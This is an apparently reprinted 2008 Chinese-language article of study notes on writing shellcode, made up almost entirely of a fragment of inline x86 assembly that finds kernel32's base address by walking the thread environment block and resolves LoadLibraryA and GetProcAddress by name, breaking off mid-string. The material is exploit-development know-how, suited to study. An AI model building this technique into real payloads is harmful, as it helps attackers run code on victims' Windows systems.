shellcode之小小琢磨

2008-04-16 10:06:06　来源:中国自学编程网　作者:佚名点击:

本文没有什么东西，只是我在研究exploitme时候的一点心得。文章内容其实很少，所以冠名“小小琢磨”。

　　  mov eax,[eax]
    add eax,ImageBase
    jmp Founded
    xor eax,eax
Founded:
    ret
  }

  __asm
  {
Start:
    push esi
    push ecx

    xor eax, eax
    xor esi, esi
    mov esi, fs:[esi + 0x18]
    mov eax, [esi+4]
    mov eax, [eax - 0x1c]
find_kernel32_base:
    dec eax
    xor ax, ax
    cmp word ptr [eax], 0x5a4d
    jne find_kernel32_base

    pop ecx
    pop esi
    mov uKernelBase,eax
    mov ImageBase,eax
    mov flen,0x0c
    call LL1
    _emit ’L’
    _emit ’o’
    _emit ’a’
    _emit ’d’
    _emit ’L’
    _emit ’i’
    _emit ’b’
    _emit ’r’
    _emit ’a’
    _emit ’r’
    _emit ’y’
    _emit ’A’
    _emit 0
LL1:
    pop eax
    mov FuncName,eax
    call GetFunc
    mov uLoadLibrary,eax

    mov flen,0x0E
    call LL2
    _emit ’G’
    _emit ’e’
    _emit ’t’
    _emit ’P’
    _emit ’r’
    _emit ’o’
    _emit ’c’
    _emit ’A’
    _emit ’d’
    _emit ’d’
    _emit ’r’
    _emit ’e’
    _emit ’s’
    _emit ’s’
    _emit 0
LL2:
    pop eax
    mov FuncName,eax
    call GetFunc
    mov uGetProcAddress,eax

    call l1
    _emit ’u’
    _emit ’s’
    _emit ’e’
    _emit ’r’
    _emit ’3’